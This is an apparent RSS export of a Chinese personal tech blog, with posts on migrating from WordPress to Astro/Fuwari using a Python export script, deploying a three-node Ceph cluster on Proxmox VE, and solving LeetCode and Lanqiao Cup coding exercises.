<li>然后在帮朋友(@<a href="https://blog.qianjunakasumi.moe/"><em>qianjunasukami</em></a>)搞<strong>K8S</strong>集群我部署了<em>Dify、n8n、HelmDashBoard、ArgoCD</em>应该就这些,我记不清了,K8S真的好难,也不太敢上手,虽然K8S的容灾和自我修复能力很强</li> <li>应该是这段时间,我自己复现训练了一个基于维基18年之前的中文数据的GPT模型,AI东西更是难上加难</li> <li>还是这段时间,我创建了三个虚拟机搭建了自己的K8S集群(一个Agent+两个Workers),也部署了单节点,对应文章<a href="https://blog.fiveqm.com/archives/448/">Debain12 部署Kubernetes 1.32.5 单节点 教程</a></li> <li>又双叒叕的这段时间,尝试了Cloudint,对应文章<a href="https://blog.fiveqm.com/archives/509/">Cloud-init ESXi 尝试</a></li> <li>在就是这段时间从 WordPress 迁移到 Astro 和将ESXI7更换成了PVE9.1 并且部署了Ceph集群 YakumoRan 在这里感谢陪我走过这些旅途的@<a href="https://blog.qianjunakasumi.moe/">qianjunasukami</a>、@<a href="https://blog.yakumoran.top/">YakumoRan</a>、@<a href="https://rerizon.cn/">Yi</a> 和其他无名客,原此行终抵群星。</li> </ul> <h1>为什么从 WordPress 迁移到 Astro?</h1> <blockquote> <p>之所以为什么从WordPress迁移到 Astro 懒得迁移静态资源和数据库,我是个经常换服务器的人,虽然都备份在Cloudflare的R2上,但是每次迁移还是怪麻烦的&lt;br&gt; WordPress的新编辑器,在Https下而且是CDN回源的情况下有问题,需要手动需改config.php 还是 settings.php ,并且我现在习惯写markdown了&lt;br&gt; 主要是这样就能绿自己的github墙了, 哈哈哈 其实也尝试过朋友使用的Hugo但是go的template语法我真的不会 选择fuwari我只是觉得比较符合我的风格</p> </blockquote> <h1>迁移脚本</h1> <blockquote> <p>用AI写的, 说实话写的比较粗糙但是够用</p> </blockquote> <pre><code>#安装库 pip install python-wordpress-xmlrpc python-frontmatter html2text requests #使用方法 #命令行参数(推荐) python wp2fuwari.py \   --url https://your-blog.com \   --user your-username \   --pass your-password \   --author your-name \   --output fuwari-export </code></pre> <h2>可选参数</h2> <table> <thead> <tr> <th>参数</th> <th>说明</th> <th>示例</th> </tr> </thead> <tbody> <tr> <td>--url</td> <td>WordPress 站点 URL</td> <td><a href="https://blog.example.com">https://blog.example.com</a></td> </tr> <tr> <td>--user</td> <td>用户名</td> <td>admin</td> </tr> <tr> <td>--pass</td> <td>密码</td> <td>secret</td> </tr> <tr> <td>--author</td> <td>作者名</td> <td>John Doe</td> </tr> <tr> <td>--output</td> <td>输出目录</td> <td>fuwari-export</td> </tr> <tr> <td>--no-images</td> <td>不下载图片</td> <td>-</td> </tr> </tbody> </table> <pre><code>导入到 Fuwari # 复制文章 cp -r fuwari-export/posts/* fuwari/src/content/posts/ # 复制图片 cp -r fuwari-export/images/* fuwari/public/images/ # 构建项目 cd fuwari pnpm build </code></pre> <h2>常见问题</h2> <p>Q: XML-RPC 连接失败?</p> <p>确保 WordPress 后台设置 &gt; 撰写中已启用 XML-RPC。</p> <p>Q: 图片下载失败?</p> <p>检查 failed_images.txt,脚本会自动处理 base64 编码的图片。</p> <p>Q: 格式转换不完美?</p> <p>建议先迁移一小部分文章测试,根据结果调整清理规则。</p> <pre><code>#!/usr/bin/env python3 # wp2fuwari.py - WordPress 迁移到 Fuwari 完整脚本 # ==================== Python 3.10+ 兼容性补丁 ==================== import collections import collections.abc # 修复废弃的 collections 导入 for attr in ('Iterable', 'Iterator', 'Mapping', 'MutableMapping',              'Sequence', 'MutableSequence', 'Callable'):     if not hasattr(collections, attr):         setattr(collections, attr, getattr(collections.abc, attr)) # ==================== 正常导入 ==================== from wordpress_xmlrpc import Client from wordpress_xmlrpc.methods.posts import GetPosts import frontmatter import os import re import sys import argparse from html2text import HTML2Text from datetime import datetime import urllib.parse import requests import html # ==================== 配置 ==================== class Config:     WP_URL = ''  # 例如: https://blog.example.com     WP_USER = ''     WP_PASS = ''     OUTPUT_DIR = 'fuwari-export'     POSTS_DIR = f'{OUTPUT_DIR}/posts'     IMAGES_DIR = f'{OUTPUT_DIR}/images'     # 下载设置     DOWNLOAD_IMAGES = True     TIMEOUT = 30     RETRY = 3     # 作者名 - 修改这里的默认值     AUTHOR = 'your-name'  # ← 修改为你想要的默认作者名 # ==================== 工具函数 ==================== def clean_slug(title):     """生成干净的 URL slug"""     slug = re.sub(r'[^\w\s-]', '', title).strip().lower()     slug = re.sub(r'[-\s]+', '-', slug)     return slug[:50] def clean_wp_tags(text):     """清理 WordPress Gutenberg 块标记"""     # 移除块注释标签     text = re.sub(r'&lt;--\s*wp:\w+(\s+[^&gt;]*)?\s*--&gt;', '', text)     text = re.sub(r'&lt;--\s*/wp:\w+\s*--&gt;', '', text)     # 移除 HTML 注释     text = re.sub(r'&lt;!--.*?--&gt;', '', text, flags=re.DOTALL)     # 移除 WordPress Gutenberg 块类名     text = re.sub(r'\s*class="wp-block[^"]*"', '', text)     text = re.sub(r'\s*class="size-[^"]*"', '', text)     return text def extract_description(content, excerpt, max_len=150):     """提取描述 - 去除所有 HTML 标签,返回双引号包裹的文本"""     # 首先清理 WordPress 块标记     content = clean_wp_tags(content)     excerpt = clean_wp_tags(excerpt) if excerpt else excerpt     def clean_html(text):         """去除所有 HTML 标签和实体"""         # 移除 HTML 标签         text = re.sub(r'&lt;[^&gt;]+&gt;', '', text)         # 解码 HTML 实体         text = html.unescape(text)         # 清理多余空白         text = re.sub(r'\s+', ' ', text).strip()         return text     if excerpt and len(excerpt.strip()) &gt; 10:         text = clean_html(excerpt)         desc = text[:max_len] + ('...' if len(text) &gt; max_len else '')         return desc     text = clean_html(content)     text = re.sub(r'[#*`!\[\]\(\)]', '', text)     desc = text[:max_len] + ('...' if len(text) &gt; max_len else '')     return desc def ensure_dirs():     """创建输出目录"""     os.makedirs(Config.POSTS_DIR, exist_ok=True)     os.makedirs(Config.IMAGES_DIR, exist_ok=True) def init_html2text():     """配置 HTML2Text"""     h = HTML2Text()     h.body_width = 0     h.ignore_links = False     h.ignore_images = False     h.wrap_links = False     h.ignore_tables = False     h.skip_internal_links = False     h.inline_links = True     h.protect_links = True     h.wrap_list_items = False     h.include_sup_sub = True     return h # ==================== 图片处理 ==================== class ImageDownloader:     def __init__(self):         self.session = requests.Session()         self.session.headers.update({             'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36'         })         self.downloaded = set()         self.failed = []     def extract_images(self, md_content, post_date):         """提取并替换图片路径"""         cover_candidate = ''         image_map = {}         def replace_image(match):             nonlocal cover_candidate             alt_text = match.group(1)             img_url = urllib.parse.unquote(match.group(2))             # 解析文件名             parsed = urllib.parse.urlparse(img_url)             orig_filename = os.path.basename(parsed.path) or 'image.jpg'             # 清理文件名             clean_name = re.sub(r'[^\w.\-]', '_', orig_filename)             if '.' not in clean_name:                 clean_name += '.jpg'             # 添加日期前缀             date_prefix = post_date.strftime('%Y%m%d')             new_filename = f'{date_prefix}_{clean_name}'             new_path = f'/images/{new_filename}'             # 记录映射: 原始URL -&gt; 本地文件名             image_map[img_url] = new_filename             # 设置封面候选             exts = ['.jpg', '.jpeg', '.png', '.webp', '.gif']             if not cover_candidate and any(ext in clean_name.lower() for ext in exts):                 cover_candidate = new_path             return f'![{alt_text}]({new_path})'         new_content = re.sub(r'!\[(.*?)\]\((.*?)\)', replace_image, md_content)         return new_content, cover_candidate, image_map     def download(self, image_map, post_date):         """下载所有图片"""         if not Config.DOWNLOAD_IMAGES or not image_map:             return         # 从日期生成可能的 WordPress 上传路径         year = post_date.strftime('%Y')         month = post_date.strftime('%m')         date_str = post_date.strftime('%Y%m%d')         for orig_url, filename in image_map.items():             if filename in self.downloaded:                 continue             # 构建可能的 URL 列表             urls_to_try = []             # 如果 orig_url 是绝对 URL,优先使用             if orig_url.startswith('http'):                 urls_to_try.append(orig_url)             # WordPress 标准上传路径             base_url = Config.WP_URL.rstrip('/')             # 移除日期前缀获取原始文件名             orig_name = filename.replace(f'{date_str}_', '')             urls_to_try.extend([                 f"{base_url}/wp-content/uploads/{filename}",                 f"{base_url}/wp-content/uploads/{year}/{month}/{orig_name}",                 f"{base_url}/wp-content/uploads/{year}/{orig_name}",             ])             # 尝试下载             saved = False             for url in urls_to_try:                 try:                     resp = self.session.get(url, timeout=Config.TIMEOUT)                     if resp.status_code == 200 and len(resp.content) &gt; 100:                         filepath = os.path.join(Config.IMAGES_DIR, filename)                         with open(filepath, 'wb') as f:                             f.write(resp.content)                         self.downloaded.add(filename)                         print(f"      ↓ {filename}")                         saved = True                         break                 except Exception:                     continue             if not saved:                 self.failed.append((filename, orig_url))                 print(f"      ✗ {filename} (下载失败)") # ==================== 主导出逻辑 ==================== def export_posts():     """导出 WordPress 文章"""     # 验证配置     if not all([Config.WP_URL, Config.WP_USER, Config.WP_PASS]):         print("错误: 请配置 WP_URL, WP_USER, WP_PASS")         print("示例: python wp2fuwari.py --url https://blog.com --user admin --pass secret")         sys.exit(1)     ensure_dirs()     h = init_html2text()     downloader = ImageDownloader()     # 连接 WordPress     print(f"连接 {Config.WP_URL} ...")     try:         wp = Client(f"{Config.WP_URL}/xmlrpc.php", Config.WP_USER, Config.WP_PASS)     except Exception as e:         print(f"连接失败: {e}")         sys.exit(1)     # 获取文章     print("获取文章列表...")     posts = wp.call(GetPosts({         'post_type': 'post',         'post_status': 'publish',         'number': 1000     }))     print(f"找到 {len(posts)} 篇文章\n")     # 处理每篇文章     success = 0     failed = 0     for i, post in enumerate(posts, 1):         try:             title_display = post.title[:40] if len(post.title) &gt; 40 else post.title             print(f"[{i}/{len(posts)}] {title_display}...")             # HTML 转 Markdown             md_content = h.handle(post.content)             # 清理 WordPress Gutenberg 块标记             md_content = re.sub(r'&lt;!--\s*wp:\w+(\s+[^&gt;]*)?\s*--&gt;', '', md_content)             md_content = re.sub(r'&lt;!--\s*/wp:\w+\s*--&gt;', '', md_content)             md_content = re.sub(r'class="[^"]*"', '', md_content)  # 移除空 class             md_content = html.unescape(md_content)  # 解码 HTML 实体             md_content = re.sub(r'\n{3,}', '\n\n', md_content)  # 清理多余空行             # 处理图片             md_content, cover, image_map = downloader.extract_images(md_content, post.date)             # 构建 frontmatter (Fuwari 格式)             # 使用 datetime 对象,frontmatter 会输出为无引号的日期格式             published_date = post.date.replace(tzinfo=None)             updated_date = (                 post.date_modified.replace(tzinfo=None)                 if hasattr(post, 'date_modified') and post.date_modified                 else post.date.replace(tzinfo=None)             )             metadata = {                 'title': post.title.strip(),                 'published': published_date,                 'updated': updated_date,                 'description': extract_description(post.content, post.excerpt),                 'author': Config.AUTHOR,                 'category': post.terms[0].name if post.terms else 'uncategorized',                 'tags': [t.name for t in post.terms if hasattr(t, 'taxonomy') and t.taxonomy == 'post_tag'] or [],                 'cover': cover,                 'draft': False,             }             # 创建 Markdown 文件             md_file = frontmatter.Post(md_content, **metadata)             slug = clean_slug(post.title)             filename = f"{post.date.strftime('%Y-%m-%d')}-{slug}.md"             filepath = os.path.join(Config.POSTS_DIR, filename)             fm_string = frontmatter.dumps(md_file, allow_unicode=True)             with open(filepath, 'w', encoding='utf-8') as f:                 f.write(fm_string)             # 下载图片             if image_map:                 print(f"    发现 {len(image_map)} 张图片")                 downloader.download(image_map, post.date)             success += 1         except Exception as e:             print(f"    ✗ 失败: {e}")             failed += 1     # 统计     sep_line = '=' * 50     print(f"\n{sep_line}")     print("导出完成!")     print(f"成功: {success} | 失败: {failed}")     print(f"图片: {len(downloader.downloaded)} 成功, {len(downloader.failed)} 失败")     print(f"输出: {os.path.abspath(Config.OUTPUT_DIR)}")     # 写入失败日志     if downloader.failed:         log_path = f'{Config.OUTPUT_DIR}/failed_images.txt'         with open(log_path, 'w', encoding='utf-8') as f:             for name, url in downloader.failed:                 f.write(f"{name}\t{url}\n")         print(f"失败列表: {log_path}")     def process_failed_images():         """处理失败图片列表中的 base64 编码图片"""         failed_log_path = f'{Config.OUTPUT_DIR}/failed_images.txt'         if not os.path.exists(failed_log_path):             return         print(f"\n处理失败图片列表中的 base64 图片...")         with open(failed_log_path, 'r', encoding='utf-8') as f:             lines = f.readlines()         processed = []         failed_again = []         for line in lines:             line = line.strip()             if not line or '\t' not in line:                 continue             filename, url_or_data = line.split('\t', 1)             # 检查是否是 base64 编码             if 'base64,' in url_or_data:                 try:                     # 提取 base64 数据                     base64_data = url_or_data.split('base64,')[1]                     import base64                     image_data = base64.b64decode(base64_data)                     # 保存图片                     filepath = os.path.join(Config.IMAGES_DIR, filename)                     with open(filepath, 'wb') as f:                         f.write(image_data)                     print(f"  ✓ {filename} (base64 decoded)")                     processed.append(filename)                 except Exception as e:                     print(f"  ✗ {filename} (base64 decode failed: {e})")                     failed_again.append(line)             else:                 # 保留非 base64 的失败记录                 failed_again.append(line)         # 更新失败列表         if failed_again:             with open(failed_log_path, 'w', encoding='utf-8') as f:                 for line in failed_again:                     f.write(line + '\n')             print(f"剩余 {len(failed_again)} 个图片仍需手动处理")         else:             os.remove(failed_log_path)             print("所有失败图片已处理完成")         return processed         # 在 export_posts() 函数末尾、sys.exit(0) 之前调用         # 位置:在 "下一步提示" 之后         # 处理 base64 编码的失败图片         process_failed_images()     # 下一步提示     print(f"\n下一步:")     print(f"  1. cp -r {Config.POSTS_DIR}/* fuwari/src/content/posts/")     print(f"  2. cp -r {Config.IMAGES_DIR}/* fuwari/public/images/")     print("  3. cd fuwari &amp;&amp; pnpm build") # ==================== 命令行入口 ==================== def main():     parser = argparse.ArgumentParser(description='WordPress 迁移到 Fuwari')     parser.add_argument('--url', help='WordPress 站点 URL')     parser.add_argument('--user', help='用户名')     parser.add_argument('--pass', dest='password', help='密码')     parser.add_argument('--output', default='fuwari-export', help='输出目录')     parser.add_argument('--author', default=None, help='作者名 (如果不指定则使用 Config.AUTHOR)')     parser.add_argument('--no-images', action='store_true', help='不下载图片')     args = parser.parse_args()     # 应用命令行参数     if args.url:         Config.WP_URL = args.url     if args.user:         Config.WP_USER = args.user     if args.password:         Config.WP_PASS = args.password     Config.OUTPUT_DIR = args.output     Config.POSTS_DIR = f'{args.output}/posts'     Config.IMAGES_DIR = f'{args.output}/images'     # 只在命令行指定了作者时才覆盖配置     if args.author:         Config.AUTHOR = args.author     Config.DOWNLOAD_IMAGES = not args.no_images     export_posts() if __name__ == '__main__':     main() </code></pre> <hr /> 部署Ceph集群https://blog.fiveqm.com/archives/%E4%B8%89%E8%8A%82%E7%82%B9ceph%E9%9B%86%E7%BE%A4/https://blog.fiveqm.com/archives/%E4%B8%89%E8%8A%82%E7%82%B9ceph%E9%9B%86%E7%BE%A4/一次基于PVE9.1部署Ceph集群的尝试Tue, 10 Feb 2026 00:00:00 GMT<h2>1. 前置配置</h2> <p>使用PVE创建Debian13虚拟机(创建了一个模板克隆出来了三台虚拟机分别为<strong>Ceph-1</strong>、<strong>Ceph-2</strong>、<strong>Ceph-3</strong>)</p> <table> <thead> <tr> <th>VMID</th> <th>Hostname</th> <th>IP</th> <th>Hardware</th> <th>Disk</th> </tr> </thead> <tbody> <tr> <td>101</td> <td>ceph-1</td> <td>10.5.0.1</td> <td>4C8G</td> <td>32G ( System) + 310G( OSD )</td> </tr> <tr> <td>102</td> <td>ceph-2</td> <td>10.5.0.2</td> <td>4C8G</td> <td>32G ( System) + 310G( OSD )</td> </tr> <tr> <td>103</td> <td>ceph-3</td> <td>10.5.0.3</td> <td>4C8G</td> <td>32G ( System) + 310G( OSD )</td> </tr> </tbody> </table> <p>我这里将一块1T的HDD (TOSHIBA MG03ACA100) 分成三个310G直通给虚拟机作为Ceph的OSD</p> <pre><code>#列举磁盘 lsblk -o NAME,SIZE,TYPE,MODEL sda 931.5G disk 硬盘型号 #sdx 中的x代表每个大体都不一样,比如我这里是a,但是一般的sda都是系统盘但是我这是系统盘是sdb,硬盘型号为对应具体的硬盘的硬盘型号 # 安装parted apt install parted # 清空磁盘并建立GPT分区 wipefs -a /dev/sda parted /dev/sda --script mklabel gpt #划分 3 个 310G 分区 parted /dev/sda --script \ mkpart "ceph-data-1" xfs 1MiB 310GiB \ mkpart "ceph-data-2" xfs 310GiB 620GiB \ mkpart "ceph-data-3" xfs 620GiB 930GiB \ mkpart "reserved" xfs 930GiB 100% #检查分区情况 lsblk /dev/sda NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINTS sda 8:0 0 931.5G 0 disk ├─sda1 8:1 0 310G 0 part ├─sda2 8:2 0 310G 0 part ├─sda3 8:3 0 310G 0 part └─sda4 8:4 0 1.5G 0 part #获取by-id ls -l /dev/disk/by-id/ | grep sda lrwxrwxrwx 1 root root 9 Feb 10 13:04 (by-id) -&gt; ../../sda lrwxrwxrwx 1 root root 10 Feb 10 18:27 (by-id)-part1 -&gt; ../../sda1 lrwxrwxrwx 1 root root 10 Feb 10 18:27 (by-id)-part2 -&gt; ../../sda2 lrwxrwxrwx 1 root root 10 Feb 10 18:27 (by-id)-part3 -&gt; ../../sda3 lrwxrwxrwx 1 root root 10 Feb 10 18:27 (by-id)-part4 -&gt; ../../sda4 #将分区直通给虚拟机 qm set 101 -scsi1 /dev/disk/by-id/(by-id)-part1 qm set 102 -scsi1 /dev/disk/by-id/(by-id)-part2 qm set 103 -scsi1 /dev/disk/by-id/(by-id)-part3 </code></pre> <h2>2. 配置Host并安装cephadm和其他依赖</h2> <pre><code>#设置 hostname #Ceph-1 hostnamectl set-hostname ceph-1 #Ceph-2 hostnamectl set-hostname ceph-2 #Ceph-3 hostnamectl set-hostname ceph-3 #修改Hosts文件 nano /etc/hosts 10.5.0.1 ceph-1 10.5.0.2 ceph-2 10.5.0.3 ceph-3 #请同时修改127.0.1.1的host #时间同步 apt update &amp;&amp; apt install chrony systemctl enable --now chrony #安装cephadm和llvm apt update &amp;&amp; apt install cephadm #在管理节点执行,我这里管理节点是ceph-1,也可以同时安装ceph-common #在其他节点执行 apt install -y podman lvm2 #podman可以换成docker </code></pre> <h2>3. 引导集群 (Bootstrap)</h2> <pre><code>#在管理节点 cephadm bootstrap \ --mon-ip 10.5.0.1 \ --initial-dashboard-user admin \ --initial-dashboard-password 'StrongPass123!' #可以使用--image quay.io/ceph/ceph:v19 指定镜像版本 默认为quay.io/ceph/ceph:v18 #也可不指定 initial-dashboard-user 和 initial-dashboard-password #如果 hostname -f 和 hostname -s 输出的结果不同可加上 --allow-fqdn-hostname 参数 </code></pre> <h2>4. 分发SSH公钥</h2> <pre><code>#可以将管理节点上的 /etc/ceph/ceph.pub 追加到其他节点的 /root/.ssh/authorized_keys 中 #也可以使用 ssh-copy-id ssh-copy-id -f -i /etc/ceph/ceph.pub root@ceph-2 ssh-copy-id -f -i /etc/ceph/ceph.pub root@ceph-3 </code></pre> <h2>5. 将节点添加到集群</h2> <pre><code>#进入 Ceph Shell cephadm shell #添加主机 ceph orch host add ceph-2 10.5.0.2 ceph orch host add ceph-3 10.5.0.3 #验证主机列表 ceph orch host ls HOST ADDR LABELS STATUS ceph-1 10.5.0.1 _admin ceph-2 10.5.0.2 ceph-3 10.5.0.3 #退出Ceph Shell exit </code></pre> <h2>6. 添加存储 (OSD)</h2> <pre><code>#进入 Ceph Shell cephadm shell #方式A:一键添加所有可用磁盘,这会将所有节点上空的、未分区的磁盘都做成 OSD ceph orch apply osd --all-available-devices #方式B:指定特定磁盘,精确控制,例如只使用 ceph-1 的 /dev/sdb 请按照实际情况调整 ceph orch daemon add osd ceph-1:/dev/sdb ceph orch daemon add osd ceph-2:/dev/sdb ceph orch daemon add osd ceph-3:/dev/sdb #查看 OSD 状态 ceph osd tree ID CLASS WEIGHT TYPE NAME STATUS REWEIGHT PRI-AFF -1 0.90807 root default -3 0.30269 host ceph-1 0 hdd 0.30269 osd.0 up 1.00000 1.00000 -5 0.30269 host ceph-2 1 hdd 0.30269 osd.1 up 1.00000 1.00000 -7 0.30269 host ceph-3 2 hdd 0.30269 osd.2 up 1.00000 1.00000 </code></pre> <h2>7. 部署服务 (MDS, RGW 等)</h2> <pre><code>#部署 CephFS (文件存储) ceph orch apply mds fs_name --placement="3 ceph-1 ceph-2 ceph-3" #部署 RGW (对象存储) ceph orch apply rgw realm_name --placement="3 ceph-1 ceph-2 ceph-3" </code></pre> <h2>8. 创建存储池</h2> <p>在 Ceph 中创建存储池(Pool)通常分为两个步骤:<strong>创建池</strong> 和 <strong>指定应用类型</strong>。</p> <ol> <li> <p>创建一个通用存储池 (最常用) 这是最基础的创建方式,适用于大多数情况(如 RBD 块存储)。</p> <ol> <li> <p>创建池 默认情况下,Ceph 使用<strong>3副本</strong>模式。</p> <pre><code># 语法: ceph osd pool create &lt;池名字&gt; ceph osd pool create mypool </code></pre> </li> <li> <p>初始化应用类型 如果不执行这一步,集群会显示 <code>HEALTH_WARN</code>,提示 <code>application not enabled on 1 pool(s)</code>。</p> <p>你需要告诉 Ceph 这个池是用来干什么的:</p> <ul> <li><strong>rbd</strong>: 虚拟机、块设备</li> <li><strong>cephfs</strong>: 文件系统</li> <li><strong>rgw</strong>: 对象存储</li> </ul> <pre><code># 语法: ceph osd pool application enable &lt;池名字&gt; &lt;应用类型&gt; ceph osd pool application enable mypool rbd </code></pre> </li> </ol> </li> <li> <p>为 CephFS 创建存储池</p> <p>部署 CephFS(文件系统),<strong>必须至少创建两个池</strong>:一个用于存储数据,一个用于存储元数据。</p> <pre><code># 1. 创建数据池 ceph osd pool create cephfs_data ceph osd pool application enable cephfs_data cephfs # 2. 创建元数据池 ceph osd pool create cephfs_metadata ceph osd pool application enable cephfs_metadata cephfs # 3. 创建文件系统 (关联这两个池) # 语法: ceph fs new &lt;fs_name&gt; &lt;metadata_pool&gt; &lt;data_pool&gt; ceph fs new myfs cephfs_metadata cephfs_data </code></pre> </li> <li> <p>修改副本数 (适用于小规模集群)</p> <p>默认的 Ceph 池配置是 <strong>Size=3</strong> (存3份数据) 且 <strong>Min_size=2</strong> (最少2份数据才允许写)。</p> <p><strong>如果你只有 1 台或 2 台 OSD 节点</strong>,默认配置会导致集群无法达到 <code>HEALTH_OK</code> 甚至无法写入。需要修改副本数:</p> <pre><code># 只有 1 个节点/OSD 的测试环境: ceph osd pool set mypool size 1 ceph osd pool set mypool min_size 1 # 只有 2 个节点/OSD 的环境: ceph osd pool set mypool size 2 ceph osd pool set mypool min_size 1 </code></pre> </li> </ol> <h2>9. 常用管理命令</h2> <pre><code>#查看所有池 ceph osd pool ls detail # 或者查看更详细的使用情况: ceph df #删除存储池,为了防止误删,Ceph 默认禁止删除池。必须先允许删除,再执行删除操作。 #允许删除 (临时的) ceph tell mon.* injectargs --mon_allow_pool_delete=true #删除池 (需要重复确认池名字) # 语法: ceph osd pool delete &lt;池名&gt; &lt;池名&gt; --yes-i-really-really-mean-it ceph osd pool delete mypool mypool --yes-i-really-really-mean-it #验证操作,创建完成后,检查集群状态: ceph -s #只要没有 PGs are degraded/undersized 之类的错误,且状态为 HEALTH_OK,说明池创建成功且数据分布正常。 #升级ceph #可选备份 cp /etc/ceph/ceph.conf /etc/ceph/ceph.conf.bak cp /etc/ceph/ceph.pub /etc/ceph/ceph.pub.bak #例如从18升级到19SS ceph orch upgrade start --image quay.io/ceph/ceph:v19 ceph osd require-osd-release squid #启用新特新,启用后无法回滚降级 </code></pre> leetcode 刷题记录1https://blog.fiveqm.com/archives/566/https://blog.fiveqm.com/archives/566/66. 加一 给定一个表示 大整数 的整数数组 digits,其中 digitsi 是整数的第 i 位数字。这些数字按从左到右,从最高位到最低位排列。这个大整数不包含任何前导 0。 将大整数加 1,并返回结果的数字数组。 class Solutionobject: def plusOneself, ...Mon, 21 Jul 2025 12:22:38 GMT<h2>66. 加一</h2> <p>给定一个表示 <strong>大整数</strong> 的整数数组 <code>digits</code>,其中 <code>digits[i]</code> 是整数的第 <code>i</code> 位数字。这些数字按从左到右,从最高位到最低位排列。这个大整数不包含任何前导 <code>0</code>。</p> <p>将大整数加 1,并返回结果的数字数组。</p> <pre><code>class Solution(object): def plusOne(self, digits): """ :type digits: List[int] :rtype: List[int] """ a="" b = [] c= 0 for i in digits: a+=str(i) c = int(a) +1 for i in str(c): b.append(int(i)) return b </code></pre> <h2>1957. 删除字符使字符串变好</h2> <p>一个字符串如果没有 <strong>三个连续</strong> 相同字符,那么它就是一个 <strong>好字符串</strong> 。</p> <p>给你一个字符串 <code>s</code> ,请你从 <code>s</code> 删除 <strong>最少</strong> 的字符,使它变成一个 <strong>好字符串</strong> 。</p> <p>请你返回删除后的字符串。题目数据保证答案总是 **唯一的 **。</p> <pre><code>class Solution(object): def makeFancyString(self, s): """ :type s: str :rtype: str """ res = "" for i in range(len(s)): if i&gt;1: if s[i] == s[i-1] and s[i] == s[i-2]: pass else: res +=s[i] else: res +=s[i] return res </code></pre> <h2><a href="https://leetcode.cn/problems/maximum-erasure-value/">1695. 删除子数组的最大得分</a></h2> <p>给你一个正整数数组 <code>nums</code> ,请你从中删除一个含有 <strong>若干不同元素</strong> 的子数组**。** 删除子数组的 <strong>得分</strong> 就是子数组各元素之 <strong>和</strong> 。</p> <p>返回 <strong>只删除一个</strong> 子数组可获得的 <strong>最大得分</strong> _ 。_</p> <p>如果数组 <code>b</code> 是数组 <code>a</code> 的一个连续子序列,即如果它等于 <code>a[l],a[l+1],...,a[r]</code> ,那么它就是 <code>a</code> 的一个子数组。</p> <pre><code>class Solution(object): def maximumUniqueSubarray(self, nums): current_sum = 0 max_sum = 0 seen = set()#初始化一个空集合,记录当前窗口内的元素(用于去重),什么都没有 left = 0 for right in range(len(nums)): while nums[right] in seen: seen.remove(nums[left]) current_sum -= nums[left] left += 1 seen.add(nums[right]) current_sum += nums[right] max_sum = max(max_sum,current_sum) """ nums: [4, 2, 4, 5, 6] index: 0 1 2 3 4 ↑ ↑ left right seen = {2, 4} left 默认为第一个元素,right 从第一个开始遍历 默认将right 遍历的nums 的元素 添加进set创建的空集合里 当nums[right] 遍历到一个元素已经存在在set创建的空集合里 也就是说出现了重复的元素并且这个这个元素与nums[left]重复 seen.remove(nums[left]) 删除旧的重复的元素 举例子就是 当nums[right]遍历到nums[2] 时值为4 但是与nums[left]也就是nums[0]重复 使用seen.remove(nums[left]) 删除掉set创造的集合里的nums[0] 也就是seen[0] 使得 seen = {4, 2} --&gt; seen = {2, 4} 然后left++ 继续循环 """ return max_sum </code></pre> 蓝桥杯web刷题记录2https://blog.fiveqm.com/archives/545/https://blog.fiveqm.com/archives/545/【算法题】小兔子爬楼梯 const climbStairs = n => { ifn <=2 { return n } else { return climbStairsn-1 + climbStairsn-2 } } module.exports = climbStairs; 非常好的递归入门 【...Mon, 21 Jul 2025 09:06:45 GMT<h2>【算法题】小兔子爬楼梯</h2> <pre><code>const climbStairs = (n) =&gt; { if(n &lt;=2 ){ return n } else { return climbStairs(n-1) + climbStairs(n-2) } } module.exports = climbStairs; </code></pre> <p>非常好的递归入门</p> <h2>【功能实现】购物车</h2> <pre><code>&lt;!DOCTYPE html&gt; &lt;html lang="en"&gt; &lt;head&gt; &lt;meta charset="UTF-8"&gt; &lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt; &lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt; &lt;title&gt;购物车&lt;/title&gt; &lt;script src="./js/vue.js"&gt;&lt;/script&gt; &lt;script src="./js/axios.js"&gt;&lt;/script&gt; &lt;link rel="stylesheet" href="./css/element-ui.css"&gt; &lt;link rel="stylesheet" href="./css/index.css"&gt; &lt;/head&gt; &lt;body&gt; &lt;div id="app"&gt; &lt;h4&gt;购物车&lt;/h4&gt; &lt;!-- 购物车列表 --&gt; &lt;div&gt; &lt;el-card v-for="(item,index) in carlist" :key="index"&gt; &lt;!-- 商品图片 --&gt; &lt;img :src="item.img"&gt; &lt;div&gt; &lt;span&gt; &lt;!-- 商品名称 --&gt; {{ item.name }} &lt;/span&gt; &lt;div &gt; &lt;el-button type="text" &gt;+&lt;/el-button&gt; &lt;el-button type="text" &gt; &lt;!-- 商品数量 --&gt; {{item.num}} &lt;/el-button&gt; &lt;el-button type="text" &gt;-&lt;/el-button&gt; &lt;/div&gt; &lt;/div&gt; &lt;/el-card&gt; &lt;/div&gt; &lt;/div&gt; &lt;/div&gt; &lt;!-- 引入组件库 --&gt; &lt;script src="./js/element-ui.js"&gt;&lt;/script&gt; &lt;script&gt; new Vue({ el: "#app", data: { carlist: [] //购物车列表 }, created() { // 在这里使用axios 发送请求 axios.get("carList.json").then((res)=&gt;{ this.carlist = res.data }) }, }) &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; </code></pre> <h2>【算法实现】随机数生成器</h2> <pre><code>/** * 封装函数,函数名 getRandomNum(min,max,countNum) * 生成 min~max 范围的 countNum 个不重复的随机数,存入数组并返回 */ //生成指定数目和范围的随机数 const getRandomNum = function(min,max,countNum){ var arr = []; function red(){ let res = Math.floor(Math.random()*(max-min+1))+min // Math.random() * (max - min + 1) // 生成一个在 [0, max - min + 1) 的小数 // 比如:min = 3, max = 7,就变成 [0, 5) // 最后 + min 把上一步的 0~(max-min) 映射成 min~max。 return res } for(let i = 0;i&lt;countNum;i++){ let ress = red() if(!arr.includes(ress)){ arr.push(ress) } } return arr; } module.exports = getRandomNum; //请勿删除 </code></pre> <h2>echarts 柱形图</h2> <pre><code>&lt;!DOCTYPE html&gt; &lt;html lang="en"&gt; &lt;head&gt; &lt;meta charset="UTF-8"&gt; &lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt; &lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt; &lt;title&gt;echarts 柱形图&lt;/title&gt; &lt;script src="./echarts.js"&gt;&lt;/script&gt; &lt;/head&gt; &lt;body&gt; &lt;div id="main" style="width: 600px;height:400px;"&gt;&lt;/div&gt; &lt;script type="text/javascript"&gt; // 基于准备好的dom,初始化echarts实例 